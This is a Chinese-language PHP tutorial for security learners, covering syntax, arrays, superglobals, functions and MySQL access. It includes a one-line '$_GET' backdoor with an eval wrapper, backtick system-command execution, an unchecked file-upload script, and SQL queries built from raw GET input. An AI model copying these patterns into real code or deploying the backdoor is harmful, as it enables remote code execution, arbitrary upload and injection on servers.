PHP

PHP基础

初识PHP

• 了解PHP 语言

PHP 语言标记

<h1>My Name is XIU!</h1>
<script>
    console.log("This message is from info.php!")
</script>
<?php           // PHP 的开始标记，表示从此标记开始，进入PHP 模式。
    phpinfo();  // PHP 代码
                // PHP 的结束标记，表示从开始标记到结束标记，之间的内容是PHP 模式
                // 之后的内容依然被PHP 解释引擎认为是纯文本字符串。
?>

说明：

• 在PHP 文件中，可以与HTML 和JavaScript 混编。
• 开始标记<?php 表示进入PHP 模式，结束标记?>，标识退出PHP 模式。
• PHP 模式之外的内容会被作为字符输出到浏览器中。
• HTML 或JavaScript 对于PHP 来说就是纯文本字符串。

$str=<<<HTML
<h1>test.php</h1>
<script>
    console.log("This message is from test.php!");
</script>
HTML;
    echo $str;

安全问题：如果是一个在线的网站能够看到phpinfo 页面，说明存在敏感信息泄露漏洞，这个漏洞需要体现在后面的渗透测试报告中。

基础语法

指令分隔符

分号;，代表一句PHP 代码的结束。

注释

单行注释

phpinfo();  //  该函数会显示PHP 配置信息

多行注释

/*
    这是多行注释！
    以下语句表示PHP 配置信息
*/
phpinfo();

空白字符

空白符包括：

空白字符	表达
空格
TAB 制表符	\t
回车换行	\r\n

这些空白字符在PHP 中都是无关紧要的，可以将一个语句展开成任意行，或者紧缩在一行，空格与空行的合理运用可以增强代码的清晰性与可读性，如果运用不合理反而会对阅读产生负担！

但是，不能是用空白符打断PHP 的关键字，例如函数名，语句名，变量名，类名，方法名等等。

变量

• 掌握PHP 语言中变量的命名
• 掌握PHP 语言中字符串类型变量的定义

变量概述

变量在任何一门语言中都处于核心地位。

变量是用于临时存储值的容器，通过变量名能够访问到变量值，变量包含四个部分内容：

• 变量名
• 变量值
• 数据类型
• 内存空间

PHP 脚本语言是一种弱数据类型语言，变量或常量的数据类型由程序的上下文决定，给一个变量赋予什么样的值，就是什么数据类型。

变量声明与初始化

变量命名

变量名称组成：

$ + 变量名

变量名是严格区分大小写的。以下变量是完全不同的：

$name;
$Name;
$NAME;

变量名由字母、数字、下划线组成，并且不能以数字开头，也不能包含空白字符、特殊字符等其他字符。

$name = "xiu";
$name1 = "XIU";
$my_name = "天下";
$_name = "一统天下";
//$1name;
//$n@me;
//$nam$;

变量命名时，建议使用驼峰式命名法或者下划线命名法，做到变量名的”见名知意”。

$firstName;
$LastName;
$first_name;
$last_name;

PHP 中有一些标识符是系统定义的，也称为关键字，是PHP 语言的组成部分，因此不建议使用它们中的任何一个作为变量名，包括函数名，类名等。

$echo;      //建议不要使用

变量声明与初始化

直接赋值，直接使用。

echo $username;     // Notice: Undefined variable: username

$username = "XIU";

echo $username;

变量释放

unset() 函数释放指定的变量。

$username = "XIU";

echo $username;

unset($username);

echo $username;     //Notice: Undefined variable: username

可变变量

可变变量，一个变量的名字可以动态的设置和使用。$$ 是php 的特性，也是产生php 中变量覆盖漏洞的原因之一。

// $$.php

$username = "XIU";
$XIU = "I am from China!";

// echo $username;     // XIU
// echo $XIU;        // I am from China!
// echo $$username;    // I am from China!  $($username) -> $XIU

$$username = "i love php!";
echo $XIU;

变量类型

变量类型是指保存在该变量中的数据的数据类型，在计算机编程语言世界中每个数据都有它的类型。

具有相同类型的数据才能被彼此相互操作。

在强类型的语言中例如C 语言，变量要通过声明指定类型，然后才可以存储对应指定的数据，就好比现实生活中在制作一个柜子之前，就要决定好这个柜子的类型，是书柜那么以后就只能用来存书，是衣柜以后就只能用来存衣服。

但是PHP 是一种弱类型的语言，和其他语言不同的是，变量或者常量的数据类型由程序的上下文决定，不需要事先声明类型。一个柜子，要是往里面存书籍那么他就是书柜；要是往里面存放衣服，那么它就是衣柜，根本不需要事先说明这个是书柜还是衣柜，一切根据实际需要使用即可。

可以将数据的变量类型输出，使用的函数var_dump()。

// var_dump.php

$name   = "XIU";      // string
$sex    = true;         // bool
$age    = 24;           // int
$score  = 59.9;         // float

// echo $name;
// echo $sex;           // 1
// var_dump($sex);
// var_dump($score);
var_dump($name);

bool

布尔类型，这个是最简单的类型，布尔型表达了true 或false，即真或假。

// bool.php

$a = true;
$b = false;

var_dump($b);

进行if 判断的时候，如果表达式不是bool 类型的值，会有类型转换，其他类型的值转换成布尔类型的值。大多数的值是被认为是true，少部分以下值被认为是false。

bool(false)
int(0)
float(0)
string(0)""
string(1)"0"
array(0){}
NULL

int

整型，存储整数。

$age = 24;
var_dump($age);

float

浮点型，也称double，指包含小数的数。

$score = 99.9;
var_dump($score);

string

字符串是有序的一系列字符。字符串可以使用单引号、双引号、定界符三种方法来定义。

单引号定义字符串：

• 单引号定义的字符串中不能包含单引号，如果包含，需要转义\'。
• 单引号中的变量不会被识别。

// string.php

$name = 'XIU';
$msg = 'Welcome, ';

echo $msg.$name;        // . 运算符，在PHP 中代表字符串拼接。

双引号定义字符串：

• 双引号中可以包含单引号，双引号中包含双引号，需要转义\"。
• PHP 会解析双引号之间的变量，最好用{} 将变量名括起来。

// string.php

$username = "XIU";

$message = "Welcome, {$username}";

echo $message;

定界符定义字符串：

• 当需要定义输出大段字符串时，并且该字符串中有超多特殊字符，包括单引号，双引号等等。
• 定界符定义的字符串中的单双引号，还有大部分特殊字符不需要进行转义。
• 定界符开始标识符<<< + 标志，标志建议大写字母，并且具备一定的语义。
• 定界符结束标示符标志 + ;，结束标识符之后，只能有换行回车。
• 标志的命名规则，字母、数字、下划线，并且不能以数字开始。
• 定界符中的$ 同样会识别成变量，变量名要用{} 括起来。

// string.php

$name = "XIU";
$msg = <<<XIU
<h1>My Name is <span style = "color:pink">{$name}</span>!</h1>
<script>
    console.log('This message is from info.php!')
</script>
XIU;
echo $msg;

常量

常量是一个简单值的标示符，如其名称所暗示的。在PHP 脚本执行期间一个常量一旦被定义，就不能被改变或者取消定义，常量的作用域是全局，常量包含bool，int，float，string 类型的数据。

定义和使用

常量的命名与变量类似，也遵循PHP 标识符的名称规则，按照惯例常量标识符总是大写的。

// define.php

define("USERNAME", "XIU");

// USERNAME = 'XIU';
// unset("USERNAME");

echo USERNAME;

变量一般由$ 符号起头，常量一般大写。

预定义常量

PHP 已经定义好了，可以直接使用的常量，一般代表特殊的含义。魔术常量是预定义常量中比较特殊的一类。

常量名	常量值
FILE	当前的文件名，完整的路径。
LINE	当前行号
FUNCTION	当前的函数名
CLASS	当前的类名
METHOD	当前对象的方法名
PHP_OS	操作系统类型
PHP_VERSION	当前PHP 的版本
DIRECTORY_SEPARATOR	目录的分隔符。

运算符

• 了解运算符
• 掌握反引号和@ 符号用法

算术运算符

例子	名称	结果
-$a	取反	$a 的负值
$a + $b	加法	$a和$b 的和
$a - $b	减法	$a 和$b 的差
$a * $b	乘法	$a 和$b 的积
$a / $b	除法	$a 除以$b 的商
$a % $b	取模，取余	$a 除以$b 的余数
++ $a	前加	$a 的值加一，然后返回$a
$a++	后加	返回$a，然后将$a 的值加一
–$a	前减	$a 的值减一， 然后返回$a
$a–	后减	返回$a，然后将$a 的值减一

<meta charset = "utf-8">
<h1>算术运算符</h1>
<?php
$a = 10;
$b = 3;

// echo -$a;
// echo $a + $b;
// echo $a - $b;
// echo $a * $b;
// echo $a / $b;
// echo $a % $b;
// echo ++ $a;
// echo $a ++;
// echo -- $a;
echo $a--;

字符串运算符

字符串运算符完成的主要工作，就是字符串拼接。

在JS 语言中，字符串拼接用+，运算符. 的作用是访问对象中的属性或者方法。

PHP 中，使用. 进行字符串拼接。PHP 中. 也叫连接运算符。

<meta charset = "utf-8">
<h1>字符串连接符</h1>
<?php
$name = "XIU";
$str = "Hello,".$name;
//$str = "Hello,"+$name;
var_dump($str);
?>

赋值运算符

左边的操作数必须是变量，右边可以是一个表达式，也可以是一个值，一个变量等等。

作用：将右边表达式的值赋给左边变量。

二元赋值运算符	例子	解释
=
+=
-=
*=
/=
%=
.=

<meta charset = "utf-8">
<h1>赋值运算符</h1>
<?php
$a = 10;
$b = 3;

// $a += $b; 
// $a -= $b;
// $a *= $b; 
// $a /= $b;
// $a %= $b;
$a .= $b;          

echo $a;

比较运算符

对操作数（按照比较运算符的要求,规则）进行比较后，得到返回值（boolean）。

如果比较出的结果满足比较运算符的要求那么结果就是true（真，成立，满足），否则就是false （假，不成立，不满足）。

例子	说明	备注
$a == $b	等于
$a === $b	全等	值相等并且数据类型相同
$a != $b	不等
$a <> $b	不等
$a !== $b	不全等
$a < $b	小于
$a > $b	大于
$a <= $b	小于等于
$a >= $b	大于等于

<meta charset = "utf-8">
<h1>比较运算符</h1>
<?php
$a = 5;
$b = 3;
$c = $a == $b;
$c = $a === $b;
$c = $a != $b;
$c = $a <> $b;
$c = $a !== $b;
$c = $a > $b;
$c = $a >= $b;
$c = $a < $b;
$c = $a <= $b;

var_dump($c);

?>

PHP 中规定：使用echo 输出布尔类型值的时候echo true; 它在页面中会输出1。echo false; 它会在页面中什么都不输出。建议使用var_dump() 来输出更明了的结果。

逻辑运算符

逻辑运算符	例子	解释	运算符法则
and &&	$a and $b $a && $b	逻辑”与”运算
or ||	$a or $b $a || $b	逻辑”或”运算
xor	$a xor $b	逻辑”异或”运算	相同为假，不同为真。
!	!$a	逻辑”非”运算

<meta charset = "utf-8">
<h1>逻辑运算符</h1>
<?php
$a = true;
$b = false;
//var_dump($a);
//var_dump($b);
$c = ($a and $b);
$c = ($a && $b);
$c = ($a or $b);
$c = ($a || $b);
$c = ($a xor $b);
$c = !$a;

var_dump($c);
?>

其他运算符

?:

$a = 10;
$b = 20;
$max = $a > $b ? $a : $b;
echo $max;

反引号

自动适配系统命令，调用系统命令。

// ``.php

$cmd = "whoami";
$cmd = "ipconfig";
$cmd = "net user";

echo "<pre>".`$cmd`;

@

屏蔽表达式可能发生的错误。

echo @$username;

PHP 流程控制

• 了解PHP 流程控制过程
• 掌握if，while，for 等流程控制语句的用法。

顺序执行

自上而下的执行即可，这也是PHP 语句的默认执行过程。对这个执行过程没有控制。

echo "This is first echo";
echo "<br />";
echo "This is second echo";
echo "<br />";
echo "This is third echo";

分支执行

分支执行可以根据表达式的值是否为True 来选择执行某些代码，PHP 的分支执行主要通过if 和switch 来实现。

if 语句

语言结构

if(){//判断条件，如果判断条件的返回值为True，则执行语句块1，否则执行语句块2
    //语句块1
}else{
    //语句块2
}

单向条件：

// if.php

$score = 59.9;
if($score >= 60 ){
    echo "congratulations";
}

双向条件：

// if.php

$score = 99.9;
if($score >= 60 ){
    echo "congratulations";
}else{
    echo "Sorry, you may need help!";
}

多向条件：成绩定级脚本。

switch 语句

功能与if 语句类似，当需要多向分支结构时，并且判断条件是具体的某个值，此时大多使用switch 结构。

<?php
$day = 7;

switch($day){
    case 1:
        echo "Monday";
        break;
    case 2 :
        echo "Tuesday";
        break;
    case 3 :
        echo "Wednesday";
        break;
    case 4 :
        echo "Thursday";
        break;
    case 5:
        echo "Friday";
        break;
    case 6:
		echo "Saturday!";
        break;
    case 7:
        echo "Sunday!";
        break;
    default:
        echo "Error!";
}
?>

注意：

• 表达式的值最好是整形或者字符串。
• 不要忘记break 语句，用来跳出switch 语句。每个case 语句后面都加上break。
• 如果某个case 语句后面并没有接语句块，那么就说明这个语句块的内容是同下。
• case 后面的语句块是不需要{} 括起来的。

判断条件

在编写if 语句时，要求判断条件是一个布尔类型的值。但是实际应用中，是无法保障这一点。如果判断条件是非布尔类型的值，就需要强制转换成布尔类型的值。如下：

// if.php

$flag = 0;
$flag = 0.0;
$flag = "";
$flag = "0";
$flag = array();
$flag = NULL;
$flag = "XIU";
$flag = true;
$flag = 24;
$flag = 59.9;

if($flag){
    echo var_dump($flag)." means Ture";
}else{
    echo var_dump($flag)." means False"; 
}

循环执行

计算机最擅长的功能之一就是按照规定的条件，重复执行某些操作，这是程序设计中最能发挥计算机特长的程序结构。

while

语言结构

while(表达式){//当表达式的值为真的时候，执行循环体。
    //循环体
}

当表达式的值为true，就执行下面的循环体。当循环体执行结束之后，继续判断表达式的值是true 还是false，如果还是true，那么就继续执行循环体。直到，这个表达式的值为false，那么这个while 语句就执行结束了。

例子：输出1 到100 数字。

// while.php

$a = 1;

while ($a <= 100) {
    echo $a."<br />";
    $a ++;
}

do while

//  do-while.php

$a = 1;

do{
    echo $a."<br />";
    $a ++;
}while ($a <= 10);

for

语法格式。

for(;;){//计数器;判断条件;自增或自减
    //循环体
}

例子：输出1 到1000 数字。

// for.php

for ($i=0; $i < 1000 ; $i++) { 
    echo $i."<br />";
}

特殊流程

break

break 用于switch，for，while，do…while，foreach 等的中断。后面可以接上一个数字来表示跳出几层循环。默认不加就是跳出当前循环语句。

// break.php

for ($i=1; $i <= 100; $i++) { 
    if ($i % 17 == 0) {
       break;
    }
    echo $i."<br />";
}

echo "PHP is DONE!";

continue

continue 只能用在循环语句，轮空本次循环，并不是结束整个循环语句。

//  continue.php

for ($i=1; $i <= 100; $i++) { 
    if ($i % 17 == 0) {
       continue;
    }
    echo $i."<br />";
}

echo "PHP is DONE!";

exit

exit 表示结束当前整个PHP 脚本的执行。同die() 语句。

// exit.php

for ($i=1; $i <= 100; $i++) { 
    if ($i % 17 == 0) {
        // exit;
        // exit("PHP is OVER");
        // die("PHP is OVER");
        die();
    }
    echo $i."<br />";
}

echo "PHP is DONE!";

PHP数组

数组概念

了解PHP 中数组的概念

掌握数组的创建方法

数组概述

学生信息

$name = "xiu";
$sex = true;
$age = 18;
$score = 99.9;

$stu1 = $name;
$stu1 = $sex;
$stu1 = $age;
$stu1 = $score;

var_dump($stu1);

把学生信心存储在一个变量里，需要用数组来实现。

$name   = "xiu";
$sex    = true;
$age    = 18;
$score  = 99.9;

$stu1[] = $name;
$stu1[] = $sex;
$stu1[] = $age;
$stu1[] = $score;

echo "<pre>";
var_dump($stu1);

数组特点

键值对（key-value）；

键，key，存储数组中，变量的“编号”。

值，value，存储数组中，变量的值。

数组中的元素可以是任意类型的数据对象。

索引数组，变量的“编号”是整数，整数不具备一定的语义。

关联数组，变量的”编号”用字符串表示，可以具备一定的语义。

$name   = "xiu";
$sex    = true;
$age    = 18;
$score  = 99.9;

$stu1['name'] = $name;
$stu1['sex'] = $sex;
$stu1['age'] = $age;
$stu1['score'] = $score;

echo "<pre>";
var_dump($stu1);

数组创建

直接赋值

语法：

$stu1[] = $name;            //默认是索引数组，从0开始计数。

$stu1['name'] = $name;      //key 一般是字符串，就是关联数组。

创建第二个学生信息。

$stu2['name'] = "HMM";
$stu2['sex'] = false;
$stu2['age'] = 22;
$stu2['score'] = 99.9;

array 语言结构

语法：

变量 = array(变量1,变量2,...);

变量 = array(
    'key1' => value1,
    'key2' => value2,
  ...
)

• => 特殊的字符，在array 语言结构 中连接key 和value 。
• PHP 中数组的key 如果是字符串就具备一定的语义，可以非常方便的了解变量的含义。
• PHP 数组中的key ，不建议使用除了整型和字符串的其他类型。
• array() 不是函数，而是一种语言结构。

创建其他学生信息：

$stu3 = array('zs', true, 25, 59.9);

$stu4 = array(
    'name'  => 'ls',
    'sex'   => true,
    'age'   => 24,
    'score' => 90.0
);

print_r($stu4);

print_r 与echo 类似，在输出布尔类型变量True 时，打印的是1；在输出False 时，打印什么都没有。

多维数组

数组中的元素可以是任何类型的数据。数组中的元素也可以是数组。

创建多维数组

一个班级有四个学生。

$ns_class = array($stu3, $stu4);

echo "<pre>";
print_r($ns_class);

数组元素访问

数组元素访问的基本方法

掌握数组的遍历方法

数组元素操作

元素访问

通过key 找到数组中的元素。

echo $stu3[3];
echo "<br />";
echo $ns_class[1]["score"];

元素操作

对元素的操作包括：

数组元素操作	说明
读取	通过key，捕获数组中的value。
修改	直接赋值即可。
增加	直接赋值即可。
删除	PHP 中删除数组中的元素意义不大，置之不理即可。

尝试修改数组中的元素：

echo "ls的成绩是 {$ns_class[1]["score"]}<br />";
echo "ls努力学习中...<br />";
$ns_class[1]["score"] += 0.1;
echo "ls的成绩是 {$ns_class[1]["score"]}";

尝试写一个座右铭：

$stu1['word'] = "为往圣继绝学，为万世开太平。";
var_dump($stu1);

数组的遍历

遍历数组，就是数组中的每个元素都访问一次。

for 循环

使用for 循环可以遍历数组，但是此种方法依赖于数组中key 自然数规律。

for ($i = 0; $i < count($stu1); $i++) { 
    echo $stu1[$i]."<br />";
}

显然，此种方法具有局限性，只能遍历索引数组。

foreach 语句

foreach 语法结构提供了遍历数组的简单方式。

foreach 这种语言结构是专门用来遍历数组的，foreach 是一种循环，不需要额外计时器。

foreach ($variable as $key => $value) {
    # code...
}

直接访问数组的值：

foreach ($stu2 as $v) {
    echo $v."<br />";
}

访问键值对：

foreach ($stu2 as $k => $v) {
    echo $k. "=". $v. "<br />";
}

注意：

• foreach 是用来遍历数组的循环语言结构，数组中多少个元素，该语言结构就会循环执行几次。
• foreach 语言结构中，临时变量的名字可以变化，但是语言结构不能改变。

预定义超全局数组变量

了解PHP 中预定义超全局数组变量的地位

掌握相关数组的用法

概述

预定义，PHP 已经定义好了，已经存在的，可以直接拿过来使用。

超全局：超级全局变量，作用域是超全局，可以在脚本的任何地方访问和使用，包括函数内部、外部。

数组速查

名称	作用
$_GET	通过URL 参数（又叫query string）传递给当前脚本的变量的数组。 注意：该数组不仅仅对method 为 GET 的请求生效，而是会针对所有带query string 的请求。
$_POST	当HTTP POST 请求的Content-Type 是application/x-www-form-urlencoded 或multipart/form-data 时，会将变量以关联数组形式传入当前脚本。
$_FILES	通过HTTP POST 方式上传到当前脚本的项目的数组。此数组的概况在POST 方法上传 章节中有描述。
$_COOKIE	通过HTTP Cookies 方式传递给当前脚本的变量的数组。
$_SESSION	当前脚本可用 SESSION 变量的数组。更多关于如何使用的信息，参见Session 函数 文档。
$_REQUEST	默认情况下包含了$_GET，$_POST 和$_COOKIE 的数组。

注意：

• 以上数组都是预定义，超全局的。
• 以上数组在不同的PHP 版本中有不同的表现，但是大方向没变。

$_GET

示例代码

//  get.php

var_dump($_GET);

说明

• $_GET 是一个预定义数组。
• 作用域是超全局，脚本的任何地方都可以使用。
• 接收从浏览器客户端用户GET 方式传递到服务器的参数。
• GET 传参的参数名做$_GET 数组的key，参数值作为数组的value。
• GET 传参时，直接将参数拼接到URL 中即可。

GET 传参

GET /php/functions/get.php?username=AJEST&password=654321 HTTP/1.1
Host: localhost

$_POST

示例代码

// post.php

var_dump($_POST);

说明：

• $_POST 用于接收浏览器客户端用户以POST 方式传递过来的参数。
• POST 传参，参数在请求正文中。

POST 请求

POST /php/functions/post.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

username=admin&password=123456

$_COOKIE

COOKIE 技术

为了弥补HTTP 协议的无状态性，保持用户的会话状态，需要使用Cookie 技术。

Cookie 过程：

• 用户提交账密
• 服务器进行身份认证
• 下发身份证，下发Cookie。
• 浏览器客户端用户所有的请求都会携带身份信息，携带Cookie 信息。
• 整体流程体现为，保持了HTTP 会话的状态性。

实例代码

//  cookie.php

var_dump($_COOKIE);

写入Cookie

//console
document.cookie = "username=admin";
document.cookie = "passoword=123456";

HTTP 请求报文：

GET /php/functions/cookie.php HTTP/1.1
Host: 10.4.7.187
Cookie: username=admin; password=123456

$_REQUEST

$_REQUEST，默认包含了$_GET，$_POST，$_COOKIE 数组中的所有变量。以上提到的三个数组，包含了浏览器客户端的三大传参方式。

$_FILES

参数

$_FILES['uploaded']	用来保存文件上传信息的。uploaded 就是文件域input 标签name 属性的值。
$_FILES['uploaded']['name']	上传文件的名字。
$_FILES['uploaded']['type']	上传文件的类型。
$_FILES['uploaded']['tmp_name']	上传文件存储在服务器中的缓存路径。
$_FILES['uploaded']['error']	错误代码。
$_FILES['uploaded']['size']	上传文件的大小

$_FILES 中存储的与上传文件有关的信息，不是文件本身，文件内容在缓存路径中。

正常完成文件上传功能，需要将文件的从缓存拷贝到服务器文件系统中。

文件上传

文件上传的实现，可以有以下步骤：

• 利用$_FILES 数组捕获文件上传信息。
• 将缓存中的文件拷贝到目标路径下。

完整代码：

<html>
    <head>
        <title>文件上传</title>
        <meta charset="utf8">
    </head>
    <body>
        <h1>文件上传测试</h1>

<?php

// echo "<pre>";
// var_dump($_FILES);

if(isset($_POST['submit'])){
    $img_path_tmp = $_FILES['uploaded']['tmp_name'];
    echo "上传文件的缓存路径为：{$img_path_tmp}<br />";

    $img_path_target = "./images/{$_FILES['uploaded']['name']}";

    if(move_uploaded_file($img_path_tmp, $img_path_target)){
        echo "文件上传成功！";
        echo "上传文件的目标路径为：{$img_path_target}";
    }else {
        echo "文件上传失败！";
    }
}else{

$html = <<<FORM
<form action="#" method = "post" enctype="multipart/form-data">
<input type="file" name = "uploaded">
<input type="submit" value="submit" name="submit">
</form>
FORM;
    echo $html;
}
?>
    </body>
</html>

PHP函数

自定义函数

掌握PHP 语言中函数定义的方法

掌握函数的调用

了解变量的作用范围

了解传参过程

函数定义

函数就是可以完成固定功能的语句或语句集合，可以重复调用。

函数语言结构

function 函数名(形式参数1,形式参数2...){
    //函数体

    return 返回值
}

函数名()

定义一个简单的函数：

// funtion.php

function test(){
    echo "This is function ".__FUNCTION__;
}

test();

函数传参

// function.php

function add($x, $y){
    $sum = $x + $y;
    return $sum;
}

echo add(10, 3);

注意

• function 是PHP 的关键字，用于完成函数的定义；
• 函数名的命名，应该避开PHP 关键字，命名规则与变量的命名规则相同；
• 形式参数，形参，给函数传递参数用的，仅作占位用；
• 实际参数，实参，真正参与函数运算的；
• 函数体，执行函数功能的部分。
• 返回值，返回给调用的地方，默认返回NULL。

函数调用

函数的调用，函数名加上小括号。

函数调用过程

function a(){
    echo "This is func ".__FUNCTION__."<br />";
}

function b(){
    echo __FUNCTION__." is starting...<br />";
    a();
    echo __FUNCTION__." is stopped!<br />";
}

b();

注意

• 函数的调用，直接函数名字后面加上() 即可，() 可以看作是运算符；
• 调用函数之后执行的过程是相对独立的，互不干扰，默认没有联系；
• 函数执行完毕，返回调用的位置继续向下执行。

变量范围

• 局部变量
• 全局变量
• 超全局变量

局部变量

局部变量，就是在函数内部定义的变量，默认情况下，函数外部不能直接访问函数内部定义的变量。

// function.php

function get_name(){
    $username = "xiu";
    echo "My name is {$username}";
}
get_name();

echo $username;     // Notice: Undefined variable: username

全局变量

全局变量是在脚本中，函数或类的外部定义的变量。

// function.php

$username = "xiu";

function get_name(){
    echo "My name is {$username}";
}

get_name();     // Notice: Undefined variable: username

注意：PHP 语言中，函数内部是没有办法直接调用函数外部的变量，这一点与JavaScript 和Python 不同。

可以有如下变通方法：

• 利用函数传参的方式。

$username = "xiu";

function get_name($username){
    echo "My name is {$username}";
}

get_name($username);

• 用global 声明变量是全局变量。

// function.php

$username = "xiu";

function get_name(){
    global $username;
    echo "My name is {$username}";
}

get_name();

按值传参

默认传参方式。

function add($x, $y){
    $sum = $x + $y;
    return $sum;
}

echo add(10, 3);

对形参的操作，不会改变实参的值。

默认参数

可以给形式参数设置默认值，设置方法很简单直接赋值即可！

给函数默认值的时候，全都给。

function add($x = 0, $y = 0){
    $sum = $x + $y;
    return $sum;
}

// echo add();          // 0
// echo add(10, 3);     // 13
echo add(10);           // 10

• add(10)，单个参数数字10 是给了x 呢？还是给了y 呢？

可变函数

• 了解可变函数和基本概念和作用
• 掌握最简单后门的写法

概述

可变函数也叫变量函数，动态函数，函数名可以动态设置和调用，变量()。这是PHP 特性之一，这种特性通常会被攻击者所利用。

直接把函数名赋值给变量，通过修改变量的值，可以实现动态调用。PHP 支持可变函数的概念。这意味着如果一个变量名后有圆括号，PHP 将寻找与变量的值同名的函数，并且尝试执行它。

动态函数示例

function a(){
    echo "This is function a";
}

function b(){
    echo "This is function b";
}

// a();
// b();

// $func_name = "b";
$func_name  = ($_GET['func_name']);
$func_name();

最简单后门

通过可变函数实际上可以调用任意PHP 函数。

$_GET['a']($_GET['b']);

可变函数不能用于，例如echo，print，unset()，isset()，empty()，include，require，eval 等类似的语言结构。

可以使用自己的包装函数来将这些结构用作可变函数。

function e($code){
    @eval($code);
}

内置函数

内部（内置）函数，PHP 提供许多现成的函数或者语言结构，可以直接使用。

具体，可以参考PHP 手册。

PHP与MySQL交互

PHP 与MySQL 交互

了解PHP 与MySQL 交互流程

掌握PHP 与MySQL 交互相关函数

函数速查

函数名	作用
mysqli_connect()	与MySQL 数据库建立连接。
mysqli_close()	关闭与MYSQL 数据库建立的连接。
mysqli_connect_errno()	与MySQL 数据库建立连接时，发生错误时的错误编号。
mysqli_connect_error()	与MySQL 数据库建立连接时，发生错误时的错误信息。
mysqli_query()	执行SQL 语句。
mysqli_errno()	执行SQL 语句时，发生错误的编号。
mysqli_error()	执行SQL 语句时，发生错误的信息。
mysqli_fetch_assoc()	从结果集对象中取数据，按条取数据。

交互过程

• 建立与MySQL 链接。
• 执行SQL 语句，返回结果集对象。
• 从结果集对象中取数据。
• 关闭与MySQL 链接。

与MySQL 建立链接

直接使用PHP 提供的函数。

建立链接

$db_host = "127.0.0.1";
$db_user = "root";
$db_pass = "root";
$db_name = "pikachu";

$link = @mysqli_connect($db_host, $db_user, $db_pass, $db_name);

如果链接成功，返回object(mysqli)1；否则，返回bool(false)。

$link 是对象类型的变量，相当于一个”令牌”。

捕获连接错误

• 错误编号
• 错误详情

if(!$link){
    exit("[".mysqli_connect_errno()."] ".mysqli_connect_error());
}

关闭链接

mysqli_close($link);

执行SQL

单条SQL 语句执行

$sql = "select * from users;";

$results =  mysqli_query($link, $sql);

如果SQL 语句正常执行，就会返回对象类型object(mysqli_result)#2 的数据；否则，bool(false)。

对于insert，delete，update 等不会返回数据的SQL 语句，在执行没有错误时将返回true。对于返回数据的SQL 语句执行成功的时候会返回结果集对象，可以使用操作结果集对象的函数来从中获取数据。

SQL 错误

如果在执行SQL 语句的时候发生错误，mysqli_query 将返回false。可以使用以下函数捕获错误原因：

if(!$results){
    exit("[".mysqli_errno($link)."] ".mysqli_error($link));
}

结果集对象

操作结果集对象。

函数速查

函数	说明
mysqli_fetch_row()	以索引数组的方式获取一条记录的数据
mysqli_fetch_assoc()	以关联数组的方式获取一条记录的数据
mysqli_fetch_array()	以索引数组或关联数组的方式获取一条记录的数据
mysqli_fetch_all()	以索引数组或关联数组的方式获取全部记录的数据
mysqli_num_rows()	获取结果集对象中数据条数
mysqli_free_result()	释放与一个结果集合相关的内存

<?php
// 连接数据库
$conn = mysqli_connect("localhost", "root", "root", "pikachu");

// 查询语句
$sql = "SELECT id FROM users";

// 执行查询语句
$result = mysqli_query($conn, $sql);

// 获取一行作为关联数组
$row = mysqli_fetch_array($result, MYSQLI_ASSOC);
var_dump($row);
echo "<br \>";
// 或者获取一行作为数字数组
$row = mysqli_fetch_array($result, MYSQLI_NUM);
var_dump($row);
echo "<br \>";
// 或者获取一行作为关联数组和数字数组的组合
$row = mysqli_fetch_array($result, MYSQLI_BOTH);
var_dump($row);
echo "<br \>";
// 输出结果
echo "ID: " . $row["id"];

// 关闭连接
mysqli_close($conn);
?>

mysqli_num_rows

var_dump(mysqli_num_rows($results));

mysqli_fetch_assoc

• 以关联数组的方式从结果集对象中取记录。
• 执行一次，取得一条记录，在执行一次，取得下一条记录。

while($result = mysqli_fetch_assoc($results)){
    var_dump($result);
}

表格形式

while($result = mysqli_fetch_assoc($results)){
    echo "<tr>";
    echo "<td>{$result['id']}</td>
    <td>{$result['username']}</td>
    <td>{$result['password']}</td>";
    echo "</tr>";
}

显示不同用户信息

根据id 参数显示不同用户信息。

通过$_GET 数组捕获用户输入的id 参数。

$id = isset($_GET['id'])? $_GET['id']: 1;

$sql = "select * from users where id={$id};";

插入数据

<?php
// 连接数据库
$conn = mysqli_connect("localhost", "root", "root", "pikachu");

    $username = $_GET['username'];
    $id = $_GET['id'];
    
    
    $sql = "INSERT INTO users (id, username) VALUES ('$id', '$username')";
    
    
    if (mysqli_query($conn, $sql)) {
        $insertResult = "数据插入成功！";
    } else {
        $insertResult = "插入失败: " . mysqli_error($conn);
    }
	
	echo $insertResult;

mysqli_close($conn);
?>